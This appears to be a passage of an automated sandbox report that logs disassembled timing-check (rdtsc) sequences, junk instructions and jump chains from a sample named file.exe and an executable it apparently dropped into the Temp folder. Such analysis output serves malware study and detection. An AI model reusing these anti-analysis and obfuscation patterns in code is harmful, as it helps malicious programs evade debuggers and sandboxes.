Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54509D3 second address: 54509E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54509E8 second address: 5450A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D451445h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450A01 second address: 5450A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov di, A4DEh 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E8Fh 0x00000014 sbb ax, 018Eh 0x00000019 jmp 00007F661CE75E99h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F661CE75E8Eh 0x00000026 push eax 0x00000027 jmp 00007F661CE75E8Bh 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F661CE75E95h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450A89 second address: 5450A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450A8D second address: 5450A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450A93 second address: 5450ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F661D451440h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F661D451447h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450ADA second address: 5450023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F668D4C39E4h 0x0000000f xor eax, eax 0x00000011 jmp 00007F661CE4F5BAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F661CE75E87h 0x0000002b jmp 00007F661CE75FFBh 0x00000030 call 00007F6621A6F125h 0x00000035 mov edi, edi 0x00000037 jmp 00007F661CE75E97h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov ax, dx 0x00000043 push edi 0x00000044 pop ecx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450023 second address: 5450036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450036 second address: 545003A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545003A second address: 545009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, 52h 0x0000000c pushfd 0x0000000d jmp 00007F661D451447h 0x00000012 adc ax, 4CDEh 0x00000017 jmp 00007F661D451449h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F661D451448h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545009B second address: 545009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545009F second address: 54500A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54500A5 second address: 54500B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54500B6 second address: 54500CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54500CE second address: 5450139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661CE75E97h 0x00000009 xor esi, 0E4851AEh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 mov ax, CE37h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F661CE75E98h 0x0000002e pop ecx 0x0000002f mov ecx, edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450139 second address: 545013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545013F second address: 5450143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450143 second address: 545015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D451441h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545015F second address: 545016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54501BC second address: 54501FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F661D45143Ch 0x00000011 sub ecx, 2F694A38h 0x00000017 jmp 00007F661D45143Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f mov cl, B2h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54501FE second address: 5450E0F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F661CE75E8Bh 0x00000008 sbb cx, 97FEh 0x0000000d jmp 00007F661CE75E99h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 ret 0x00000017 nop 0x00000018 and bl, 00000001h 0x0000001b movzx eax, bl 0x0000001e lea esp, dword ptr [ebp-0Ch] 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 pop ebp 0x00000025 ret 0x00000026 add esp, 04h 0x00000029 jmp dword ptr [0086A41Ch+ebx*4] 0x00000030 push edi 0x00000031 call 00007F661CE9B887h 0x00000036 push ebp 0x00000037 push ebx 0x00000038 push edi 0x00000039 push esi 0x0000003a sub esp, 000001D0h 0x00000040 mov dword ptr [esp+000001B4h], 0086CB10h 0x0000004b mov dword ptr [esp+000001B0h], 000000D0h 0x00000056 mov dword ptr [esp], 00000000h 0x0000005d mov eax, dword ptr [008681DCh] 0x00000062 call eax 0x00000064 mov edi, edi 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F661CE75E99h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E0F second address: 5450E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E2B second address: 5450E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E2F second address: 5450E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E33 second address: 5450E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E39 second address: 5450E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E3F second address: 5450E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E43 second address: 5450E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E5C second address: 5450E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E60 second address: 5450E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E64 second address: 5450E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450E6A second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov si, 147Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F661D451448h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F661D451447h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EAB second address: 5450EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EC3 second address: 5450EF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F661D451445h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EF2 second address: 5450F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54600B6 second address: 54600D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54600D3 second address: 54600D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54600D9 second address: 54600DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54600DD second address: 5460130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F661CE75E99h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F661CE75E98h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460130 second address: 5460136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460136 second address: 546013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546013C second address: 5460140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460140 second address: 546015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F668D4AB8B0h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F661CE75E8Eh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546015F second address: 546016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54601A9 second address: 54601AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54601AE second address: 546021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F661D45143Eh 0x00000010 je 00007F668DA75BF4h 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F661D45143Dh 0x0000001e or ax, 1A46h 0x00000023 jmp 00007F661D451441h 0x00000028 popfd 0x00000029 pop ecx 0x0000002a mov edi, 606B1764h 0x0000002f popad 0x00000030 cmp dword ptr [ebp+08h], 00002000h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F661D451446h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A88 second address: 5470A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A97 second address: 5470A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A9D second address: 5470AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F661CE75E96h 0x00000011 push eax 0x00000012 jmp 00007F661CE75E8Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F661CE75E96h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 movsx edx, cx 0x00000024 pop eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470AF3 second address: 5470B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F661D45143Bh 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B0C second address: 5470B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B10 second address: 5470B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B16 second address: 5470B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B1B second address: 5470B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, DD0Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B2F second address: 5470B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B42 second address: 5470B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F661D451443h 0x00000015 or ch, 0000003Eh 0x00000018 jmp 00007F661D451449h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470B99 second address: 5470BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F661CE75E8Eh 0x00000010 je 00007F668D493683h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F661CE75E97h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470BD9 second address: 5470C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F661D451443h 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470D47 second address: 5470D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470D4B second address: 5470D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 3DE4A8 second address: 3DE4AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 3DE4AE second address: 3DE4D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F661D451443h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F661D451436h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 3DE4D2 second address: 3DE4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54D771 second address: 54D77B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CC9B second address: 54CC9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CC9F second address: 54CCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CE27 second address: 54CE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CE2B second address: 54CE55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 ja 00007F661D451436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CE55 second address: 54CE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CE5D second address: 54CE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451449h 0x00000009 popad 0x0000000a jl 00007F661D451438h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F661D451445h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54CE9F second address: 54CEC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E98h 0x00000007 jnc 00007F661CE75E86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54F90E second address: 54F91E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54F91E second address: 54F924 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54F924 second address: 54F9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F661D451436h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnp 00007F661D451448h 0x00000016 pop eax 0x00000017 mov si, 3394h 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F661D451438h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 cmc 0x00000038 push 00000000h 0x0000003a mov edx, dword ptr [ebp+122D2D2Ah] 0x00000040 push 00000003h 0x00000042 mov edi, 487D039Ch 0x00000047 xor dword ptr [ebp+122D28D7h], ecx 0x0000004d push C752CC9Fh 0x00000052 jmp 00007F661D45143Fh 0x00000057 xor dword ptr [esp], 0752CC9Fh 0x0000005e jmp 00007F661D451440h 0x00000063 lea ebx, dword ptr [ebp+124457E4h] 0x00000069 mov edi, ecx 0x0000006b xchg eax, ebx 0x0000006c pushad 0x0000006d jp 00007F661D45143Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 js 00007F661D451436h 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54F9D7 second address: 54F9E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe	RDTSC instruction interceptor: First address: 54FA3E second address: 54FA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, 13C73B51h 0x00000010 push 00000000h 0x00000012 jmp 00007F661D45143Eh 0x00000017 call 00007F661D451439h 0x0000001c jmp 00007F661D451444h 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jbe 00007F661D451436h 0x0000002a jnp 00007F661D451436h 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
